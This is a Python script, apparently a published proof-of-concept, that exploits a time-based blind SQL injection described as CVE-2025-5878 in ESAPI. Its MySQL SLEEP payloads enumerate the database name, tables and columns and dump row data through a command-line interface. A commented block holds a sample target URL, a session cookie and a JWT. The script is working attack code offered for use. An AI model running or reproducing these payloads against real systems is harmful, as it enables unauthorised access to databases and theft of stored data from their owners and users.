# README.md
# Rendering markdown...
import argparse
import re
import sys
import requests
import time
import string
# Target configuration
# url = "http://192.168.122.1:8888/vulnapi/sqli/jdbc/safe3"
# param_name = "id"
# cookies = {"JSESSIONID=70D53458ADD0D92F6BE69DC0F13DF22F;JWT_TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3ODA2NDY5NDgsImV4cCI6MTc4MDczMzM0OCwidXNlcm5hbWUiOiJhZG1pbiJ9.FLQCMsMxCgYOvMoU5k7KDLlv-jIgBw8zKzDrwEUBTR4"}
# Delay-detection threshold (seconds)
# self.sleep_time = 5
# timeout = 3
class ESAPISQLExploit:
    """Time-based blind SQL injection helper for a single GET parameter.

    Each probe sends one GET request whose injected parameter value asks the
    database to sleep when a condition holds; :meth:`has_sleep` reports
    whether the response was delayed.  The ``calc_length`` / ``inject_*``
    methods chain such probes to recover a length, names, or column values
    one step at a time.

    Intended for use only against systems you are authorised to test.
    """

    def __init__(self, url, cookies, headers):
        """Split *url* into endpoint and injectable parameter name.

        Args:
            url: Target URL with a query string such as ``?id=1``.  The text
                between ``?`` and the following ``=`` becomes the injected
                parameter name; everything from ``?`` onwards is dropped
                from the stored endpoint.
            cookies: Cookie string (``"a=1; b=2"``) or dict; a falsy value
                means no cookies are sent.
            headers: Header mapping passed through to every request.

        Raises:
            ValueError: If *url* contains no ``?name=`` query parameter.
                Without this check every request would be sent with a
                parameter literally named ``None``.
        """
        param_name = self._extract_param_name(url)
        if param_name is None:
            raise ValueError(
                f"URL has no '?name=' query parameter to inject: {url!r}"
            )
        self.param_name = param_name
        self.url = url.split('?')[0]
        self.cookies = self._parse_cookies(cookies) if cookies else {}
        self.headers = headers
        # Per-request timeout (seconds) handed to requests.get().
        self.timeout = 3
        # Seconds passed to SLEEP() in every payload and used as the
        # "delayed" threshold in has_sleep().
        self.sleep_time = 5

    def _extract_param_name(self, url):
        """Return the parameter name found between ``?`` and ``=``.

        Returns:
            The matched name, or ``None`` when *url* has no such part.
        """
        match = re.search(r'\?([^=]+)=', url)
        if match:
            return match.group(1)
        return None

    def _parse_cookies(self, cookie_str):
        """Convert a cookie specification into a dict.

        Args:
            cookie_str: Either a ``"name1=value1; name2=value2"`` string or
                an already-built dict.

        Returns:
            dict: Cookie names mapped to values.  String items without
            ``=`` are ignored; only the first ``=`` of an item separates
            name from value.  Any other input type yields an empty dict.
        """
        cookies = {}
        if isinstance(cookie_str, str):
            for item in cookie_str.split(';'):
                item = item.strip()
                if '=' in item:
                    key, value = item.split('=', 1)
                    cookies[key.strip()] = value.strip()
        elif isinstance(cookie_str, dict):
            # Already a mapping: use it unchanged.
            cookies = cookie_str
        return cookies

    def has_sleep(self, payload):
        """Send *payload* in the injected parameter and detect a delay.

        Returns:
            bool: ``True`` when the request raised ``requests.Timeout`` or
            took at least ``self.sleep_time`` seconds, else ``False``.
            Other ``requests`` exceptions propagate to the caller.
        """
        query = {self.param_name: payload}
        started = time.time()
        try:
            requests.get(
                url=self.url,
                params=query,
                cookies=self.cookies,
                headers=self.headers,
                timeout=self.timeout,
            )
        except requests.Timeout:
            # With the defaults (timeout 3 s < sleep_time 5 s) a triggered
            # sleep normally surfaces here rather than as a slow response.
            return True
        return time.time() - started >= self.sleep_time

    def calc_length(self):
        """Probe the length of the current database name.

        Returns:
            int: The first ``i`` in 1..49 whose probe is delayed, or ``0``
            when none is.
        """
        found_length = 0
        for i in range(1, 50):
            # MySQL payload: sleeps once length(database()) is not above i.
            payload = f"1\\' AND IF(length(database())>{i},0,SLEEP({self.sleep_time}))-- -"
            if self.has_sleep(payload):
                print(f"\n数据库长度{i}")
                found_length = i
                break
        return found_length

    def inject_database_name(self, lengthTemp):
        """Recover the current database name, one character at a time.

        Args:
            lengthTemp: Number of characters to recover (as returned by
                :meth:`calc_length`).

        Returns:
            str: The characters found.  A position for which no candidate
            code in 45..122 produces a delay contributes nothing.
        """
        db_name = ""
        print("[*] 开始获取数据库名...")
        for i in range(1, lengthTemp + 1):
            for c in range(45, 123):
                # MySQL payload: sleeps once the character code is not above c,
                # so the first delayed candidate is taken as the character.
                payload = f"1\\' AND IF(ascii(SUBSTRING(database(),{i},1))>{c},0,SLEEP({self.sleep_time}))-- -"
                # PostgreSQL variant:
                # payload = f"1%5c' AND CASE WHEN (SUBSTRING(current_database(),{i},1)='{c}') THEN pg_sleep({self.sleep_time}) ELSE NULL END-- -"
                print(f"\r[*] 正在猜测第 {i} 位: {chr(c)}", end="")
                if self.has_sleep(payload):
                    db_name += chr(c)
                    print(f"\n[+] 第 {i} 位: {chr(c)}")
                    break
        print(f"\n[+] 数据库名: {db_name}")
        return db_name

    def inject_table_name(self, db_name):
        """Recover the table names of schema *db_name*.

        The table count is probed first (at most 19), then each name is
        guessed character by character (at most 49 characters) from
        lowercase letters, digits and ``_``.

        Returns:
            list[str]: One entry per counted table.
        """
        tables = []
        print(f"\n[*] 开始获取 {db_name} 库的表名...")
        # Count tables: keep raising i while "count >= i" still delays.
        table_count = 0
        for i in range(1, 20):
            payload = f"1\\' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\"{db_name}\")>={i},SLEEP({self.sleep_time}),0)-- -"
            if self.has_sleep(payload):
                table_count = i
            else:
                break
        print(f"[+] 共发现 {table_count} 个表")
        charset = string.ascii_lowercase + string.digits + "_"
        for t in range(1, table_count + 1):
            table_name = ""
            for i in range(1, 50):
                for c in charset:
                    payload = f"1\\' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=\"{db_name}\" LIMIT {t - 1},1),{i},1)=\"{c}\",SLEEP({self.sleep_time}),0)-- -"
                    print(f"\r[*] 第 {t} 个表: {table_name}{c}", end="")
                    if self.has_sleep(payload):
                        table_name += c
                        print(f"\n[+] 第 {t} 个表第 {i} 位: {c}")
                        break
                else:
                    # No candidate matched this position: treat it as the
                    # end of the name.
                    break
            tables.append(table_name)
        print(f"\n[+] 表名列表: {tables}")
        return tables

    def inject_column_name(self, database_name, table_name):
        """Recover the column names of *table_name* in *database_name*.

        The column count is probed first (at most 29), then each name is
        guessed character by character (at most 49 characters) from
        lowercase letters, digits and ``_``.

        Returns:
            list[str]: One entry per counted column.
        """
        columns = []
        print(f"\n[*] 开始获取 {table_name} 表的列名...")
        # Count columns: keep raising i while "count >= i" still delays.
        col_count = 0
        for i in range(1, 30):
            payload = f"1\\' AND IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_name=\"{table_name}\" and table_schema=\"{database_name}\")>={i},SLEEP({self.sleep_time}),0)-- -"
            if self.has_sleep(payload):
                col_count = i
            else:
                break
        print(f"[+] 共发现 {col_count} 个列")
        charset = string.ascii_lowercase + string.digits + "_"
        for c in range(1, col_count + 1):
            col_name = ""
            for i in range(1, 50):
                for ch in charset:
                    payload = f"1\\' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name=\"{table_name}\" and table_schema=\"{database_name}\" LIMIT {c - 1},1),{i},1)=\"{ch}\",SLEEP({self.sleep_time}),0)-- -"
                    print(f"\r[*] 第 {c} 个列: {col_name}{ch}", end="")
                    if self.has_sleep(payload):
                        col_name += ch
                        print(f"\n[+] 第 {c} 个列第 {i} 位: {ch}")
                        break
                else:
                    # No candidate matched this position: treat it as the
                    # end of the name.
                    break
            columns.append(col_name)
        print(f"\n[+] 列名列表: {columns}")
        return columns

    def inject_data(self, table_name, column_name):
        """Recover the values of *column_name* for every row of *table_name*.

        The row count is probed first (at most 99), then for each row the
        value length (at most 255) and finally each character.

        Returns:
            list[str]: One recovered string per counted row.
        """
        data_list = []
        print(f"\n[*] 开始获取 {table_name}.{column_name} 数据...")
        # Count rows: keep raising i while "count >= i" still delays.
        row_count = 0
        for i in range(1, 100):
            payload = f"1\\' AND IF((SELECT COUNT(*) FROM {table_name})>={i},SLEEP({self.sleep_time}),0)-- -"
            if self.has_sleep(payload):
                row_count = i
            else:
                break
        print(f"[+] 共发现 {row_count} 行数据")
        for r in range(1, row_count + 1):
            # Length of this row's value: first i for which "length <= i" delays.
            data_len = 0
            for i in range(1, 256):
                payload = f"1\\' AND IF((SELECT LENGTH({column_name}) FROM {table_name} LIMIT {r - 1},1)<={i},SLEEP({self.sleep_time}),0)-- -"
                if self.has_sleep(payload):
                    data_len = i
                    break
            print(f"[*] 第 {r} 行数据长度为: {data_len}")
            data = ""
            for i in range(1, data_len + 1):
                for ch in string.printable:
                    # The quote is skipped in this linear pass; the
                    # binary-search fallback below recovers it.
                    if ch == "'":
                        continue
                    # Compare by ASCII code rather than by character.
                    payload = f"1\\' AND IF(ASCII(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {r - 1},1),{i},1))={ord(ch)},SLEEP({self.sleep_time}),0)-- -"
                    print(f"\r[*] 第 {r} 行数据: {data}{ch}", end="")
                    if self.has_sleep(payload):
                        data += ch
                        break
                else:
                    # Linear pass found nothing: binary-search codes 32..126.
                    low, high = 32, 126
                    while low <= high:
                        mid = (low + high) // 2
                        payload = f"1\\' AND IF(ASCII(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {r - 1},1),{i},1))>={mid},SLEEP({self.sleep_time}),0)-- -"
                        if self.has_sleep(payload):
                            low = mid + 1
                        else:
                            high = mid - 1
                    ascii_val = high
                    if ascii_val >= 32:
                        data += chr(ascii_val)
                        print(f"\r[*] 第 {r} 行数据: {data}", end="")
                    # Deliberately no `break` here: leaving the position
                    # loop after a fallback truncated every value at its
                    # first apostrophe.  An unresolved position is skipped.
            data_list.append(data)
            print(f"\n[+] 第 {r} 行数据: {data}")
        print(f"\n[+] 数据为: {data_list}")
        return data_list
if __name__ == "__main__":
    # Command-line definition: (flags, add_argument keyword options), in
    # the order they should appear in --help.
    cli = argparse.ArgumentParser(description="ESAPI SQLinjection CVE-2025-5878 Exploit")
    option_table = (
        (("-u", "--url"), {"required": True, "help": "base URL (ej: http://target.com:3000?id=1)"}),
        (("-c", "--cookie"), {"required": True, "help": "Cookie字符串,格式: 'name1=value1; name2=value2'"}),
        (("--dbs",), {"action": "store_true", "help": "获取数据库名称"}),
        (("--tables",), {"action": "store_true", "help": "获取表名"}),
        (("--columns",), {"action": "store_true", "help": "获取指定表的列名(需要先执行-T)"}),
        (("-D", "--db"), {"help": "指定数据库名称"}),
        (("-T", "--table"), {"help": "指定获取表名"}),
        (("-C", "--column"), {"help": "获取指定表的列名(需要先执行-T)"}),
        (("--dump",), {"action": "store_true", "help": "导出指定表的数据(格式: 表名,列名1,列名2)"}),
    )
    for flags, options in option_table:
        cli.add_argument(*flags, **options)
    args = cli.parse_args()

    # The URL has to carry a query string with a name=value pair.
    url_ok = args.url and '?' in args.url and '=' in args.url
    if not url_ok:
        print("[-] 错误:URL必须包含 '?' 和 '=' 参数")
        print(f" 示例: {args.url}?id=1")
        sys.exit(1)

    headers = {"User-Agent": "Mozilla/5.0"}
    exploit = ESAPISQLExploit(url=args.url, cookies=args.cookie, headers=headers)

    # Echo the target settings.
    print(f"[*] 目标URL: {args.url}")
    if args.cookie:
        print(f"[*] 使用Cookie: {args.cookie}")

    # -C is only accepted together with -T.
    if args.column and not args.table:
        for line in (
            "[-] 错误:必须先使用 -T 获取表名,才能使用 -C 获取列名",
            " 正确顺序: python exploit.py -u <url> -T # 先获取表名",
            " python exploit.py -u <url> -C <table_name> # 再获取列名",
        ):
            print(line)
        sys.exit(1)

    # Default; overwritten by the probed value when --dbs is given.
    length = 10

    # Dispatch: each stage needs the name produced by the stage before it.
    if args.dbs:
        length = exploit.calc_length()
        exploit.inject_database_name(length)
    elif args.db is None:
        print("请先爆破数据库名或指定数据库名")
    elif args.tables:
        exploit.inject_table_name(args.db)
    elif args.table is None:
        print("请先爆破表名或指定表库名")
    elif args.columns:
        exploit.inject_column_name(args.db, args.table)
    elif args.column is None:
        print("请先爆破列名或指定列名")
    elif args.dump:
        exploit.inject_data(args.table, args.column)